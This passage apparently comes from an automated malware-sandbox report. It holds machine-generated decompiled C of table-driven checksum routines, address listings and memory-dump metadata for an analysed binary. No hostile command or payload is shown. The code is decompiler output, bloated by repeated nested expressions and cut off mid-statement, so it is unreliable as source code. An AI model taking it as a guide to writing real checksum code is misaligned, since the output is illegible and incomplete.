						_t181 =  *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8);
						_t103 =  &(_t102[1]);
						_t190 =  *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t181 >> 0x18) * 4) ^  *(0x41c2b0 + (_t181 & 0x000000ff) * 4) ^  *(_t103 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t181 >> 0x18) * 4) ^  *(0x41c2b0 + (_t181 & 0x000000ff) * 4) ^  *(_t103 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t181 >> 0x18) * 4) ^  *(0x41c2b0 + (_t181 & 0x000000ff) * 4) ^  *(_t103 - 8)) >> 0x18) * 4) ^  *(0x41c2b0 + (_t232 & 0x000000ff) * 4) ^  *(_t103 - 4);
						_t89 =  &(_t103[1]);
						_t241 =  *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4);
						_t266 = _t266 - 0x20;
						_t208 =  *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t241 >> 0x18) * 4) ^  *(0x41c2b0 + (_t241 & 0x000000ff) * 4) ^  *_t89) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t241 >> 0x18) * 4) ^  *(0x41c2b0 + (_t241 & 0x000000ff) * 4) ^  *_t89) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (( *(0x41cab0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t241 >> 0x18) * 4) ^  *(0x41c2b0 + (_t241 & 0x000000ff) * 4) ^  *_t89) >> 0x18) * 4) ^  *(0x41c2b0 + (_t199 & 0x000000ff) * 4);
						_t264 = _t264 - 1;
					} while (_t264 != 0);
				}
				if(_t266 >= 4) {
					_t164 = _t266 >> 2;
					do {
						_t212 = _t208 ^ _t89[1];
						_t89 =  &(_t89[1]);
						_t266 = _t266 - 4;
						_t164 = _t164 - 1;
						_t208 =  *(0x41cab0 + (_t212 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t212 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t212 >> 0x18) * 4) ^  *(0x41c2b0 + (_t212 & 0x000000ff) * 4);
					} while (_t164 != 0);
				}
				_t90 =  &(_t89[1]);
				if(_t266 != 0) {
					do {
						_t208 = _t208 << 0x00000008 ^  *(0x41c2b0 + (_t208 >> 0x00000018 ^  *_t90 & 0x000000ff) * 4);
						_t90 =  &(_t90[1]);
						_t266 = _t266 - 1;
					} while (_t266 != 0);
				}
				return (( !_t208 & 0x0000ff00) + ( !_t208 << 0x10) << 8) + ( !_t208 >> 0x00000008 & 0x0000ff00) + (_t209 >> 0x18);
			}
















                                                                                                                                                  0x00402b90
                                                                                                                                                  0x00402b91
                                                                                                                                                  0x00402bb8
                                                                                                                                                  0x00402bbc
                                                                                                                                                  0x00402bc0
                                                                                                                                                  0x00402bd2
                                                                                                                                                  0x00402bd9
                                                                                                                                                  0x00402bda
                                                                                                                                                  0x00402bdd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402bdd
                                                                                                                                                  0x00402bc0
                                                                                                                                                  0x00402bdf
                                                                                                                                                  0x00402be0
                                                                                                                                                  0x00402be6
                                                                                                                                                  0x00402bee
                                                                                                                                                  0x00402bf1
                                                                                                                                                  0x00402bf1
                                                                                                                                                  0x00402c34
                                                                                                                                                  0x00402c37
                                                                                                                                                  0x00402c79
                                                                                                                                                  0x00402c7c
                                                                                                                                                  0x00402cbf
                                                                                                                                                  0x00402cc2
                                                                                                                                                  0x00402cc5
                                                                                                                                                  0x00402d45
                                                                                                                                                  0x00402d85
                                                                                                                                                  0x00402d88
                                                                                                                                                  0x00402d8b
                                                                                                                                                  0x00402e03
                                                                                                                                                  0x00402e0a
                                                                                                                                                  0x00402e0a
                                                                                                                                                  0x00402bf1
                                                                                                                                                  0x00402e16
                                                                                                                                                  0x00402e1a
                                                                                                                                                  0x00402e20
                                                                                                                                                  0x00402e20
                                                                                                                                                  0x00402e23
                                                                                                                                                  0x00402e63
                                                                                                                                                  0x00402e66
                                                                                                                                                  0x00402e69
                                                                                                                                                  0x00402e69
                                                                                                                                                  0x00402e20
                                                                                                                                                  0x00402e6d
                                                                                                                                                  0x00402e73
                                                                                                                                                  0x00402e75
                                                                                                                                                  0x00402e82
                                                                                                                                                  0x00402e89
                                                                                                                                                  0x00402e8a
                                                                                                                                                  0x00402e8a
                                                                                                                                                  0x00402e75
                                                                                                                                                  0x00402eb6

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                  • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                                                                                                                  • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                  • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004028B0, Relevance: .2, Instructions: 184COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004028B0(signed int __eax, signed char __ecx, unsigned int __edx) {
				signed int _t87;
				signed int _t90;
				signed int _t119;
				signed char _t175;
				void* _t177;
				void* _t179;
				void* _t181;
				void* _t182;
				unsigned int _t188;
				unsigned int _t238;
				unsigned int _t239;

				_t175 = __ecx;
				_t239 = __edx;
				_t87 =  !__eax;
				if(__edx != 0) {
					while((_t175 & 0x00000003) != 0) {
						_t87 = _t87 >> 0x00000008 ^  *(0x41b2b0 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t239 = _t239 - 1;
						if(_t239 != 0) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				if(_t239 >= 0x20) {
					_t238 = _t239 >> 5;
					do {
						_t92 = _t87 ^  *_t175;
						_t177 = _t175 + 8;
						_t196 =  *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4);
						_t179 = _t177 + 8;
						_t101 =  *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8);
						_t181 = _t179 + 8;
						_t214 =  *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) 